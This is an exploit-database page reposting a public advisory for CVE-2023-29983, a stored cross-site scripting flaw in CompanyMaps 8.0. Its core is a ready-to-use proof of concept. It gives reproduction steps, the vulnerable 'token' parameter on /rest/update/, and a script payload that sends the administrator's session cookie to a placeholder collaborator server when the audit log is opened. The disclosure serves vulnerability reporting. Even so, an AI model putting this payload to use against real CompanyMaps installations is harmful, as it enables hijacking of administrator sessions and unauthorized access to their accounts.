Advertisement






CompanyMaps 8.0 Cross Site Scripting

CVE Category Price Severity
CVE-2023-29983 CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2023-05-03
CVSS
CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023050007

Below is a copy:

CompanyMaps 8.0 Cross Site Scripting
# Exploit Title: Stored Cross Site Scripting
# Google Dork:
# Date: 27.04.2023
# Exploit Author: Lucas Noki (0xPrototype)
# Vendor Homepage: https://github.com/vogtmh
# Software Link: https://github.com/vogtmh/cmaps
# Version: 8.0
# Tested on: Mac, Windows, Linux
# CVE : CVE-2023-29983

*Steps to reproduce:*
1. Clone the repository and install the application
2. Send a maliciously crafted payload via the "token" parameter to the following endpoint: /rest/update/?token=
3. The payload used is: <script>new+Image().src=`http://YOUR_COLLABORATOR_SERVER/?c=${document.cookie}`</script>
4. Simply visiting the complete URL: http://IP/rest/update/?token=PAYLOAD is enough.
5. Login into the admin panel and go to the auditlog under: /admin/index.php?tab=auditlog
6. Check your collaborator server. You should have a request where the admins cookie is the value of the c parameter

In a real world case you would need to wait for the admin to log into the application and open the auditlog tab.

Special thanks goes out to iCaotix who greatly helped me in getting the environment setup as well as debugging my payload.

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.